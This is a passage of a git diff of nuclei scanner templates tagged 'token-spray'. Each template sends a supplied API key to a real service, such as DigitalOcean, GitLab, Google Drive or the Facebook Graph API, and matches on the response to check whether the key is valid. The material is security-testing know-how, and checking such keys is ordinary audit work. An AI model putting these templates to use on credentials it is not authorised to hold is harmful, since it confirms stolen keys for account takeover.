+++ b/nuclei-templates/Other/api-digitalocean.yaml @@ -6,10 +6,13 @@ info: severity: info reference: - https://docs.digitalocean.com/reference/api/ + metadata: + max-request: 1 tags: token-spray,digitalocean self-contained: true -requests: + +http: - raw: - | GET https://api.digitalocean.com/v2/droplets HTTP/1.1 @@ -23,3 +26,5 @@ requests: - '"droplets":' - '"meta":' condition: and + +# digest: 4a0a004730450220048c9f87a81205b7fbead8ed3955e8806ccd16bcc988ae8ce7e5e17774cbc1a3022100e79769686477ac1a59c495ad3dc4f57ca5a1dbbd69cc2a83d786348b8d95c2f9:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-dribbble-416.yaml b/nuclei-templates/Other/api-dribbble-416.yaml new file mode 100644 index 0000000000..b2f1d0bc9e --- /dev/null +++ b/nuclei-templates/Other/api-dribbble-416.yaml @@ -0,0 +1,21 @@ +id: api-dribbble + +info: + name: Dribbble API Test + author: daffainfo + severity: info + reference: + - https://developer.dribbble.com/v2/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/Dribbble.md + tags: token-spray,dribbble + +self-contained: true +requests: + - method: GET + path: + - "https://api.dribbble.com/v2/user?access_token={{token}}" + + matchers: + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/api-dribbble-417.yaml b/nuclei-templates/Other/api-dribbble-417.yaml deleted file mode 100644 index ec36263d18..0000000000 --- a/nuclei-templates/Other/api-dribbble-417.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: api-dribbble - -info: - name: Dribbble API Test - author: daffainfo - severity: info - reference: - - https://developer.dribbble.com/v2/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Dribbble.md - tags: token-spray,dribbble - -self-contained: true -requests: - - method: GET - path: - - "https://api.dribbble.com/v2/user?access_token={{token}}" - - matchers: - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/dropbox.yaml b/nuclei-templates/Other/api-dropbox-418.yaml similarity index 100% rename from nuclei-templates/Other/dropbox.yaml rename to nuclei-templates/Other/api-dropbox-418.yaml diff --git a/nuclei-templates/Other/api-europeana-419.yaml b/nuclei-templates/Other/api-europeana-419.yaml new file mode 100644 index 0000000000..bbc103ac30 --- /dev/null +++ b/nuclei-templates/Other/api-europeana-419.yaml @@ -0,0 +1,25 @@ +id: api-europeana + +info: + name: Europeana API Test + author: daffainfo + severity: info + reference: + - https://pro.europeana.eu/page/search + - https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/Europeana.md + tags: token-spray,europeana + +self-contained: true +requests: + - method: GET + path: + - "https://api.europeana.eu/record/v2/search.json?wskey={{token}}&query=*&rows=0&profile=facets" + + matchers: + - type: word + part: body + words: + - 'success' + - 'apikey' + - 'action' + condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/api-europeana.yaml b/nuclei-templates/Other/api-europeana.yaml deleted file mode 100644 index 520c83775d..0000000000 --- a/nuclei-templates/Other/api-europeana.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: api-europeana - -info: - name: Europeana API Test - author: daffainfo - severity: info - reference: - - https://pro.europeana.eu/page/search - - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Europeana.md - tags: token-spray,europeana - -self-contained: true -requests: - - method: GET - path: - - "https://api.europeana.eu/record/v2/search.json?wskey={{token}}&query=*&rows=0&profile=facets" - - matchers: - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/api-exchangerateapi.yaml b/nuclei-templates/Other/api-exchangerateapi.yaml index 79f4626b1b..f4653a98c0 100644 --- a/nuclei-templates/Other/api-exchangerateapi.yaml +++ b/nuclei-templates/Other/api-exchangerateapi.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.exchangerate-api.com/docs/overview - https://github.com/daffainfo/all-about-apikey/tree/main/exchangerate-api + metadata: + max-request: 1 tags: token-spray,exchangerateapi self-contained: true -requests: + +http: - method: GET path: - "https://v6.exchangerate-api.com/v6/{{token}}/latest/USD" @@ -24,3 +27,5 @@ requests: - '"base_code"' - '"conversion_rates"' condition: and + +# digest: 4b0a004830460221008e939efff91306a072bc0233e435e4ef3c76e1202963420a1b1dadc4c8befa360221009615dde4d2402a46fcfc09e44697c6445caf7e52241c96e565b9497f2701eb56:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-facebook-422.yaml b/nuclei-templates/Other/api-facebook.yaml similarity index 100% rename from nuclei-templates/Other/api-facebook-422.yaml rename to nuclei-templates/Other/api-facebook.yaml diff --git a/nuclei-templates/Other/api-fastly.yaml b/nuclei-templates/Other/api-fastly.yaml index e6555d706f..9688149ef5 100644 --- a/nuclei-templates/Other/api-fastly.yaml +++ b/nuclei-templates/Other/api-fastly.yaml @@ -3,19 +3,23 @@ id: api-fastly info: name: Fastly API Test author: Adam Crosser - reference: https://developer.fastly.com/reference/api/ severity: info + reference: + - https://developer.fastly.com/reference/api/ tags: token-spray,fastly self-contained: true requests: - method: GET path: - - "https://api.fastly.com/service" + - "https://api.fastly.com/current_user" headers: Fastly-Key: "{{token}}" matchers: - - type: status - status: - - 200 \ No newline at end of file + - type: word + part: body + words: + - '"created_at":' + - '"customer_id":' + condition: and diff --git a/nuclei-templates/Other/api-festivo-425.yaml b/nuclei-templates/Other/api-festivo-425.yaml deleted file mode 100644 index 30f758bdf2..0000000000 --- a/nuclei-templates/Other/api-festivo-425.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-festivo - -info: - name: Festivo API Test - author: daffainfo - severity: info - reference: - - https://docs.getfestivo.com/docs/products/public-holidays-api/intro/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Calendar/Festivo%20Public%20Holidays.md - tags: token-spray,festivo - -self-contained: true -requests: - - method: GET - path: - - "https://api.getfestivo.com/v2/holidays?country=US&api_key={{token}}&year=2020" - - matchers: - - type: word - part: body - words: - - '"id":' - - '"holidays":' - - '"name":' - condition: and diff --git a/nuclei-templates/Other/api-festivo.yaml b/nuclei-templates/Other/api-festivo.yaml new file mode 100644 index 0000000000..3911ce2636 --- /dev/null +++ b/nuclei-templates/Other/api-festivo.yaml @@ -0,0 +1,26 @@ +id: api-festivo + +info: + name: Festivo API Test + author: daffainfo + severity: info + description: Fastest and most advanced public holiday and observance service on the market + reference: + - https://docs.getfestivo.com/docs/products/public-holidays-api/intro/ + - https://github.com/daffainfo/all-about-apikey/tree/main/festivo-public-holidays + tags: token-spray,festivo + +self-contained: true +requests: + - method: GET + path: + - "https://api.getfestivo.com/v2/holidays?country=US&api_key={{token}}&year=2020" + + matchers: + - type: word + part: body + words: + - '"id":' + - '"holidays":' + - '"name":' + condition: and diff --git a/nuclei-templates/Other/api-flickr.yaml b/nuclei-templates/Other/api-flickr.yaml index 20beaa54a4..f9342c98eb 100644 --- a/nuclei-templates/Other/api-flickr.yaml +++ b/nuclei-templates/Other/api-flickr.yaml @@ -6,10 +6,13 @@ info: severity: info reference: - https://www.flickr.com/services/developer/api/ + metadata: + max-request: 1 tags: token-spray,flickr self-contained: true -requests: + +http: - method: GET path: - "https://www.flickr.com/services/rest/?method=flickr.tags.getHotList&api_key={{token}}" @@ -22,3 +25,5 @@ requests: - 'owner' - 'username' condition: and + +# digest: 490a0046304402202d715a913703652b0eaa9bb0a7012440ff4343fefb182ecc351249af98cf9889022058751ef3d6d67063e1230302ee7fd5320037ad0e69a629db5699b790a5b169fd:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-flowdash.yaml b/nuclei-templates/Other/api-flowdash.yaml index 3f51eb88b4..1c670e9572 100644 --- a/nuclei-templates/Other/api-flowdash.yaml +++ b/nuclei-templates/Other/api-flowdash.yaml @@ -8,10 +8,13 @@ info: reference: - https://docs.flowdash.com/docs/api-introduction - https://github.com/daffainfo/all-about-apikey/tree/main/flowdash + metadata: + max-request: 1 tags: token-spray,flowdash self-contained: true -requests: + +http: - raw: - | GET https://app.flowdash.com/api/v1/workflows HTTP/1.1 @@ -25,3 +28,5 @@ requests: - '"id":' - '"name":' condition: and + +# digest: 490a00463044022005d7ad5a370f6263e28dbb59932b488a50a7aec781eb0b5a2cafd0af7c168400022061787d5f88ff385f364518a1d8332575951fe7884bbd79db2371c6b473697890:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-fontawesome.yaml b/nuclei-templates/Other/api-fontawesome-426.yaml similarity index 100% rename from nuclei-templates/Other/api-fontawesome.yaml rename to nuclei-templates/Other/api-fontawesome-426.yaml diff --git a/nuclei-templates/Other/api-fortitoken-cloud-427.yaml b/nuclei-templates/Other/api-fortitoken-cloud.yaml similarity index 100% rename from nuclei-templates/Other/api-fortitoken-cloud-427.yaml rename to nuclei-templates/Other/api-fortitoken-cloud.yaml diff --git a/nuclei-templates/Other/api-front.yaml b/nuclei-templates/Other/api-front.yaml index 4e8f759419..62775936d2 100644 --- a/nuclei-templates/Other/api-front.yaml +++ b/nuclei-templates/Other/api-front.yaml @@ -1,15 +1,18 @@ id: api-front info: - name: LaunchDarkly REST API + name: Frontapp API author: Luqmaan Hadia [Luqiih](https://github.com/Luqiih) severity: info reference: - https://dev.frontapp.com/reference/introduction + metadata: + max-request: 1 tags: token-spray,front self-contained: true -requests: + +http: - raw: - | GET https://api2.frontapp.com/accounts HTTP/1.1 @@ -25,3 +28,4 @@ requests: - "logo_url" - "name" condition: and +# digest: 4a0a00473045022100d003ae0a231bd7e86985f76bc2c2581074be0f33292b5439a4f8f0887390294f022028fd40121608b7c00d86016b41e921dda76af70a57e5350b3a39561ca374399c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/api-giphy.yaml b/nuclei-templates/Other/api-giphy.yaml index 267f072da9..a1a50b08a1 100644 --- a/nuclei-templates/Other/api-giphy.yaml +++ b/nuclei-templates/Other/api-giphy.yaml @@ -6,10 +6,13 @@ info: severity: info reference: - https://developers.giphy.com/branch/master/docs/api/ + metadata: + max-request: 1 tags: token-spray,giphy self-contained: true -requests: + +http: - method: GET path: - "https://api.giphy.com/v1/gifs/trending?api_key={{token}}" @@ -21,3 +24,5 @@ requests: - '"data":' - '"type":"gif"' condition: and + +# digest: 4a0a00473045022051fe11abec83d39e1b46bf34dddc016f79854abaf533ebd2014ea533ae2e3e7f022100a57f14d370356c978b0a538885575eeb0e54145624030058007430f18a47af9a:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-gitlab-431.yaml b/nuclei-templates/Other/api-gitlab-431.yaml index 8372a3c8a0..40aa5ddf2f 100644 --- a/nuclei-templates/Other/api-gitlab-431.yaml +++ b/nuclei-templates/Other/api-gitlab-431.yaml @@ -3,9 +3,8 @@ id: api-gitlab info: name: Gitlab API Test author: Adam Crosser + reference: https://docs.gitlab.com/ee/api/personal_access_tokens.html severity: info - reference: - - https://docs.gitlab.com/ee/api/personal_access_tokens.html tags: token-spray,gitlab self-contained: true @@ -17,9 +16,6 @@ requests: PRIVATE-TOKEN: "{{token}}" matchers: - - type: word - part: body - words: - - '"id":' - - '"created_at":' - condition: and + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/api-google-drive-432.yaml b/nuclei-templates/Other/api-google-drive-432.yaml new file mode 100644 index 0000000000..f66896d7c3 --- /dev/null +++ b/nuclei-templates/Other/api-google-drive-432.yaml @@ -0,0 +1,28 @@ +id: api-google-drive + +info: + name: Google Drive API Test + author: geeknik + severity: info + reference: + - https://developers.google.com/drive/api/guides/about-sdk + metadata: + max-request: 1 + tags: token-spray,google,drive,intrusive + +self-contained: true + +http: + - raw: + - | + GET https://www.googleapis.com/drive/v3/files/{{randstr}}.txt/%3fkey={{token}}&supportsAllDrives=true HTTP/1.1 + Referer: {{referer}} + Content-Type:application/json + + matchers: + - type: word + part: body + words: + - 'File not found: {{randstr}}.txt.' + +# digest: 4b0a00483046022100f3d2e430755236cb5354472588b85c1caa009551fffb628d51c8321a8c900fd3022100c756303eff99e074d92d5f4b223322b94572b1515b741fee9473fa14cc0984ef:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-google-drive.yaml b/nuclei-templates/Other/api-google-drive.yaml deleted file mode 100644 index b274fd83c5..0000000000 --- a/nuclei-templates/Other/api-google-drive.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: api-google-drive - -info: - name: Google Drive API Test - author: geeknik - severity: info - reference: - - https://developers.google.com/drive/api/guides/about-sdk - tags: token-spray,google,drive - -self-contained: true -requests: - - raw: - - | - GET https://www.googleapis.com/drive/v3/files/{{randstr}}.txt/%3fkey={{token}}&supportsAllDrives=true HTTP/1.1 - Referer: {{BaseURL}} - Content-Type:application/json - - matchers: - - type: word - part: body - words: - - 'File not found: {{randstr}}.txt.' diff --git a/nuclei-templates/Other/api-gorest.yaml b/nuclei-templates/Other/api-gorest.yaml index 7bb3131a2c..2b0c71e77c 100644 --- a/nuclei-templates/Other/api-gorest.yaml +++ b/nuclei-templates/Other/api-gorest.yaml @@ -8,10 +8,13 @@ info: reference: - https://gorest.co.in/ - https://github.com/daffainfo/all-about-apikey/tree/main/gorest + metadata: + max-request: 1 tags: token-spray,gorest self-contained: true -requests: + +http: - raw: - | GET https://gorest.co.in/public/v2/users HTTP/1.1 @@ -31,3 +34,5 @@ requests: part: body words: - '"name"' + +# digest: 490a00463044022040eda067fe56f4bacd7b6a7473cca2316a8716dbfb4c203a54abcb9594345e7d022001099a015686ece5d2d4fe1c587b09407c5c453732b04bb07a4b50aae452e49f:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-harvardart-433.yaml b/nuclei-templates/Other/api-harvardart-433.yaml new file mode 100644 index 0000000000..e9f965433e --- /dev/null +++ b/nuclei-templates/Other/api-harvardart-433.yaml @@ -0,0 +1,25 @@ +id: api-harvardart + +info: + name: Harvard Art Museums API Test + author: daffainfo + severity: info + reference: + - https://github.com/harvardartmuseums/api-docs + - https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/Harvard%20Art%20Museums.md + tags: token-spray,harvardart + +self-contained: true +requests: + - method: GET + path: + - "https://api.harvardartmuseums.org/color/34838442?apikey={{token}}" + + matchers: + - type: word + part: body + words: + - '"colorid"' + - '"name"' + - '"hex"' + condition: and diff --git a/nuclei-templates/Other/api-harvardart-434.yaml b/nuclei-templates/Other/api-harvardart-434.yaml deleted file mode 100644 index 7b2f15b76f..0000000000 --- a/nuclei-templates/Other/api-harvardart-434.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-harvardart - -info: - name: Harvard Art Museums API Test - author: daffainfo - severity: info - reference: - - https://github.com/harvardartmuseums/api-docs - - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Harvard%20Art%20Museums.md - tags: token-spray,harvardart - -self-contained: true -requests: - - method: GET - path: - - "https://api.harvardartmuseums.org/color/34838442?apikey={{token}}" - - matchers: - - type: word - part: body - words: - - '"colorid"' - - '"name"' - - '"hex"' - condition: and diff --git a/nuclei-templates/Other/api-heroku-435.yaml b/nuclei-templates/Other/api-heroku.yaml similarity index 100% rename from nuclei-templates/Other/api-heroku-435.yaml rename to nuclei-templates/Other/api-heroku.yaml diff --git a/nuclei-templates/Other/api-hirak-rates-436.yaml b/nuclei-templates/Other/api-hirak-rates-436.yaml new file mode 100644 index 0000000000..0557cf59fe --- /dev/null +++ b/nuclei-templates/Other/api-hirak-rates-436.yaml @@ -0,0 +1,32 @@ +id: api-hirak-rates + +info: + name: Hirak Exchange Rates API Test + author: daffainfo + severity: info + description: Exchange rates between 162 currency & 300 crypto currency update each 5 min, accurate, no limits + reference: + - https://rates.hirak.site/ + - https://github.com/daffainfo/all-about-apikey/tree/main/hirak-exchange-rates + metadata: + max-request: 1 + tags: token-spray,hirak + +self-contained: true + +http: + - method: GET + path: + - "https://rates.hirak.site/stat/?token={{token}}" + + matchers: + - type: word + part: body + words: + - '"token":' + - '"plan":' + - '"hits":' + - '"remain":' + condition: and + +# digest: 4b0a00483046022100feb1b70cc116a0e5e28e60351b93907f2994f9f53d4f5ce7337bd1e5581d1f95022100932bf3b672f01049a27014ca2bac8996fb16ac2f4ab829bdf96a780ecd3620ec:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-hirak-rates.yaml b/nuclei-templates/Other/api-hirak-rates.yaml deleted file mode 100644 index 6d61403334..0000000000 --- a/nuclei-templates/Other/api-hirak-rates.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: api-hirak-rates - -info: - name: Hirak Exchange Rates API Test - author: daffainfo - severity: info - description: Exchange rates between 162 currency & 300 crypto currency update each 5 min, accurate, no limits - reference: - - https://rates.hirak.site/ - - https://github.com/daffainfo/all-about-apikey/tree/main/hirak-exchange-rates - tags: token-spray,hirak - -self-contained: true -requests: - - method: GET - path: - - "https://rates.hirak.site/stat/?token={{token}}" - - matchers: - - type: word - part: body - words: - - '"token":' - - '"plan":' - - '"hits":' - - '"remain":' - condition: and diff --git a/nuclei-templates/Other/api-host-io.yaml b/nuclei-templates/Other/api-host-io.yaml index bd0ca1f244..5b39b56409 100644 --- a/nuclei-templates/Other/api-host-io.yaml +++ b/nuclei-templates/Other/api-host-io.yaml @@ -8,10 +8,13 @@ info: reference: - https://host.io/docs - https://github.com/daffainfo/all-about-apikey/tree/main/host-io + metadata: + max-request: 1 tags: token-spray,hostio self-contained: true -requests: + +http: - method: GET path: - "https://host.io/api/full/facebook.com?token=${{token}}" @@ -24,3 +27,5 @@ requests: - '"rank"' - '"url"' condition: and + +# digest: 4a0a00473045022051b89a5ecf5fa4e1b0a390e98ab6474c71ee8eb9c02a2d2878d8e4b8d1578639022100ef96ddd2bec41d4ab8cd0f90116e2778bb9f6b70f0ba04038f9ba19a30987c77:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-html2pdf.yaml b/nuclei-templates/Other/api-html2pdf.yaml index b228ecff8b..ce840690c1 100644 --- a/nuclei-templates/Other/api-html2pdf.yaml +++ b/nuclei-templates/Other/api-html2pdf.yaml @@ -8,10 +8,13 @@ info: reference: - https://html2pdf.app/documentation/ - https://github.com/daffainfo/all-about-apikey/tree/main/html2pdf + metadata: + max-request: 1 tags: token-spray,html2pdf self-contained: true -requests: + +http: - method: GET path: - "https://api.html2pdf.app/v1/generate?url=https://test.test&apiKey={{token}}" @@ -21,3 +24,5 @@ requests: part: body words: - '"Provided url is not accessible"' + +# digest: 4a0a00473045022100e664a2495d01c2b28fbfbb18ec076eadfabcd6794738c1aee20f055611adaf4402207e7a6222c3d4b19c780a81dfc5245377a5d4dfa5eaecd8f5a5e92b99b86d52b6:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-hubspot-437.yaml b/nuclei-templates/Other/api-hubspot-437.yaml deleted file mode 100644 index 86566864f0..0000000000 --- a/nuclei-templates/Other/api-hubspot-437.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: api-hubspot - -info: - name: HubSpot API Test - author: zzeitlin - reference: https://legacydocs.hubspot.com/docs/methods/owners/get_owners - severity: info - tags: token-spray,hubspot - -requests: - - method: GET - path: - - "https://api.hubapi.com/owners/v2/owners?hapikey={{token}}" - - "https://api.hubapi.com/contacts/v1/lists/all/contacts/all?hapikey={{token}}" - - matchers: - - type: word - part: body - words: - - 'error' - negative: true diff --git a/nuclei-templates/Other/api-hunter.yaml b/nuclei-templates/Other/api-hunter.yaml index 429485a134..ec4d4092a2 100644 --- a/nuclei-templates/Other/api-hunter.yaml +++ b/nuclei-templates/Other/api-hunter.yaml @@ -8,10 +8,13 @@ info: reference: - https://hunter.io/api-documentation/v2 - https://github.com/daffainfo/all-about-apikey/tree/main/hunter + metadata: + max-request: 1 tags: token-spray,hunter self-contained: true -requests: + +http: - method: GET path: - "https://api.hunter.io/v2/domain-search?domain=stripe.com&api_key={{token}}" @@ -24,3 +27,5 @@ requests: - '"disposable"' - '"webmail"' condition: and + +# digest: 4a0a004730450221008df0a72b01ce46d5d589570d82170497333f56f9af3175914b5a8c36c129881f022060f8f9a962d71e85258f02bb50c8af278e7c4959d5afb1f1c155366ffdc1e6d6:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-iconfinder.yaml b/nuclei-templates/Other/api-iconfinder-438.yaml similarity index 100% rename from nuclei-templates/Other/api-iconfinder.yaml rename to nuclei-templates/Other/api-iconfinder-438.yaml diff --git a/nuclei-templates/Other/api-improvmx-440.yaml b/nuclei-templates/Other/api-improvmx-440.yaml new file mode 100644 index 0000000000..1b6f7e7986 --- /dev/null +++ b/nuclei-templates/Other/api-improvmx-440.yaml @@ -0,0 +1,29 @@ +id: api-improvmx + +info: + name: ImprovMX API Test + author: daffainfo + severity: info + reference: + - https://improvmx.com/api + - https://github.com/daffainfo/all-about-apikey/blob/main/Business/ImprovMX.md + tags: token-spray,improvmx + +self-contained: true +requests: + - raw: + - | + GET https://api.improvmx.com/v3/account HTTP/1.1 + Authorization: Basic {{base64(':' + token)}} + Host: api.improvmx.com + + redirects: true + max-redirects: 1 + matchers: + - type: word + part: body + words: + - '"billing_email":' + - '"cancels_on":' + - '"company_details":' + condition: and diff --git a/nuclei-templates/Other/api-improvmx.yaml b/nuclei-templates/Other/api-improvmx.yaml deleted file mode 100644 index fb6c00f0d9..0000000000 --- a/nuclei-templates/Other/api-improvmx.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: api-improvmx - -info: - name: ImprovMX API Test - author: daffainfo - severity: info - description: API for free email forwarding service - reference: - - https://improvmx.com/api - - https://github.com/daffainfo/all-about-apikey/tree/main/improvmx - tags: token-spray,improvmx - -self-contained: true -requests: - - raw: - - | - GET https://api.improvmx.com/v3/account HTTP/1.1 - Authorization: Basic {{base64(':' + token)}} - Host: api.improvmx.com - - redirects: true - max-redirects: 1 - matchers: - - type: word - part: body - words: - - '"billing_email":' - - '"cancels_on":' - - '"company_details":' - condition: and diff --git a/nuclei-templates/Other/api-instagram.yaml b/nuclei-templates/Other/api-instagram.yaml index 289546f452..fc463c8bac 100644 --- a/nuclei-templates/Other/api-instagram.yaml +++ b/nuclei-templates/Other/api-instagram.yaml @@ -7,12 +7,17 @@ info: severity: info tags: token-spray,instagram,graph +self-contained: true requests: - method: GET path: - - "https://graph.facebook.com/v8.0/me/accounts?access_token={{token}}" + - "https://graph.facebook.com/v12.0/me/accounts?access_token={{token}}" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"data":' + - '"access_token":' + - '"name":' + condition: and diff --git a/nuclei-templates/Other/api-intelx.yaml b/nuclei-templates/Other/api-intelx.yaml index 609237bf4a..d2d1c1f278 100644 --- a/nuclei-templates/Other/api-intelx.yaml +++ b/nuclei-templates/Other/api-intelx.yaml @@ -11,17 +11,20 @@ info: - https://github.com/IntelligenceX/SDK - https://github.com/IntelligenceX/SDK/blob/master/Intelligence%20X%20API.pdf - https://intelx.io/account?tab=developer - tags: dns,scan,recon,intelx,token-spray + metadata: + max-request: 1 + tags: scan,recon,intelx,token-spray self-contained: true -requests: + +http: - method: GET path: - https://2.intelx.io/authenticate/info + headers: X-Key: "{{token}}" - User-Agent: Nuclei (+https://nuclei.projectdiscovery.io) - + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 matchers: - type: word part: body @@ -30,3 +33,5 @@ requests: - 'preview' - 'buckets' condition: and + +# digest: 4b0a00483046022100a25b478d01643eccbc7698fb31b49e70c3e281e3621335b3577262c1739b0206022100bb3320c63858860cdf12227f16471c33cf772af238025a964d61cb090093a538:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-intercom.yaml b/nuclei-templates/Other/api-intercom-443.yaml similarity index 100% rename from nuclei-templates/Other/api-intercom.yaml rename to nuclei-templates/Other/api-intercom-443.yaml diff --git a/nuclei-templates/Other/api-ip2whois.yaml b/nuclei-templates/Other/api-ip2whois.yaml index 8103ce599f..bf52fee356 100644 --- a/nuclei-templates/Other/api-ip2whois.yaml +++ b/nuclei-templates/Other/api-ip2whois.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.ip2whois.com/developers-api - https://github.com/daffainfo/all-about-apikey/tree/main/ip2whois + metadata: + max-request: 1 tags: token-spray,ip2whois self-contained: true -requests: + +http: - method: GET path: - "https://api.ip2whois.com/v2?key={{token}}&domain=daffa.tech&format=json" @@ -24,3 +27,5 @@ requests: - '"domain_id"' - '"whois_server"' condition: and + +# digest: 4a0a00473045022100d0b5c1901b529cae5c21960db2b447cc4b87f47e649a170ecf2a66efbfef920102203a03c1d223bee1fe226f02b307991f4039eef57fd9338723061409d79492449a:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-ipdata.yaml b/nuclei-templates/Other/api-ipdata.yaml index 55dcd7a70d..8f2dce3208 100644 --- a/nuclei-templates/Other/api-ipdata.yaml +++ b/nuclei-templates/Other/api-ipdata.yaml @@ -2,27 +2,31 @@ id: api-ipdata info: name: IP Data API Test - author: 0xlittleboy + author: 0xpugazh severity: info reference: - https://docs.ipdata.co/docs metadata: verified: true + max-request: 1 tags: token-spray,ipdata self-contained: true -requests: + +http: - method: GET path: - "https://api.ipdata.co/?api-key={{token}}" + matchers: - type: word part: body words: - - '"ip"' - - '"name"' - - '"asn"' - - '"route"' - - '"time_zone"' - - '"carrier"' + - '"ip":' + - '"name":' + - '"asn":' + - '"route":' + - '"time_zone":' condition: and + +# digest: 4b0a004830460221008dbcb92492cacfbe35ca123e5351a5d6861aa4bc5c6bdc55dc3f7a9affb4c455022100ceeced862a8f0bf4ed0bd80cd2a647f755a164709bddb57c22d57b6936ac00f1:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-ipfind.yaml b/nuclei-templates/Other/api-ipfind.yaml index 38aef171e0..3e579d872f 100644 --- a/nuclei-templates/Other/api-ipfind.yaml +++ b/nuclei-templates/Other/api-ipfind.yaml @@ -8,10 +8,13 @@ info: reference: - https://ipfind.io/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/ipfind + metadata: + max-request: 1 tags: token-spray,ipfind self-contained: true -requests: + +http: - method: GET path: - "https://app.ipfind.io/api/iplocation?apikey={{token}}" @@ -24,3 +27,5 @@ requests: - '"country"' - '"zipCode"' condition: and + +# digest: 4a0a00473045022020e6556a176e56998b68e20b96015498f33100337c1b19c241c409fdb73e9d4b022100a0e9205b8204ee06f6a6b1c2cfdd4b6f5b3bfb09d8f8eb937047a8a0bf75d992:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-ipinfo.yaml b/nuclei-templates/Other/api-ipinfo.yaml index e6bbfe06a2..e35421b364 100644 --- a/nuclei-templates/Other/api-ipinfo.yaml +++ b/nuclei-templates/Other/api-ipinfo.yaml @@ -2,19 +2,22 @@ id: api-ipinfo info: name: IPinfo API Test - author: 0xlittleboy + author: 0xpugazh severity: info reference: - https://ipinfo.io/developers metadata: verified: true + max-request: 1 tags: token-spray,ipinfo self-contained: true -requests: + +http: - method: GET path: - "https://ipinfo.io/?token={{token}}" + matchers: - type: word part: body @@ -25,3 +28,5 @@ requests: - '"postal"' - '"timezone"' condition: and + +# digest: 4a0a0047304502200647299d72ad3fcb1497c7b0efe83036e61985b6a2fa6fe93120f036ce314ef0022100d0474e331fa94254842c0fc6122d3350c4401cd0331ca25fd01cd59613faa6c6:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-ipstack-444.yaml b/nuclei-templates/Other/api-ipstack-444.yaml new file mode 100644 index 0000000000..9fbe1ff033 --- /dev/null +++ b/nuclei-templates/Other/api-ipstack-444.yaml @@ -0,0 +1,17 @@ +id: api-ipstack +info: + name: IPStack API Test + author: zzeitlin + reference: https://ipstack.com/documentation + severity: info + tags: token-spray,ipstack +requests: + - method: GET + path: + - "https://api.ipstack.com/8.8.8.8?access_key={{token}}" + matchers: + - type: word + part: body + negative: true + words: + - 'invalid_access_key' diff --git a/nuclei-templates/Other/api-jsonbin.yaml b/nuclei-templates/Other/api-jsonbin.yaml index 2a14309c8b..5108391403 100644 --- a/nuclei-templates/Other/api-jsonbin.yaml +++ b/nuclei-templates/Other/api-jsonbin.yaml @@ -8,10 +8,13 @@ info: reference: - https://jsonbin.io/api-reference - https://github.com/daffainfo/all-about-apikey/tree/main/jsonbin + metadata: + max-request: 1 tags: token-spray,jsonbin self-contained: true -requests: + +http: - raw: - | GET https://api.jsonbin.io/v3/c HTTP/1.1 @@ -26,3 +29,5 @@ requests: - '"collectionMeta"' - '"schemaDocId"' condition: and + +# digest: 4b0a00483046022100bc4de040545f2f307109a5025e97dd781138d16fe63344619dc86a1944687373022100f88b592d6b5098cca487c8e90941f091a7289cdbe67121bd7c1f1ff535ef75f7:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/jumpcloud.yaml b/nuclei-templates/Other/api-jumpcloud.yaml similarity index 100% rename from nuclei-templates/Other/jumpcloud.yaml rename to nuclei-templates/Other/api-jumpcloud.yaml diff --git a/nuclei-templates/Other/api-launchdarkly-449.yaml b/nuclei-templates/Other/api-launchdarkly-449.yaml index 194203017c..5490750be5 100644 --- a/nuclei-templates/Other/api-launchdarkly-449.yaml +++ b/nuclei-templates/Other/api-launchdarkly-449.yaml @@ -6,10 +6,13 @@ info: severity: info reference: - https://apidocs.launchdarkly.com/ + metadata: + max-request: 1 tags: token-spray,launchdarkly self-contained: true -requests: + +http: - raw: - | GET https://app.launchdarkly.com/api/v2/members HTTP/1.1 @@ -27,3 +30,5 @@ requests: - '"totalCount":' - '"items":' condition: and + +# digest: 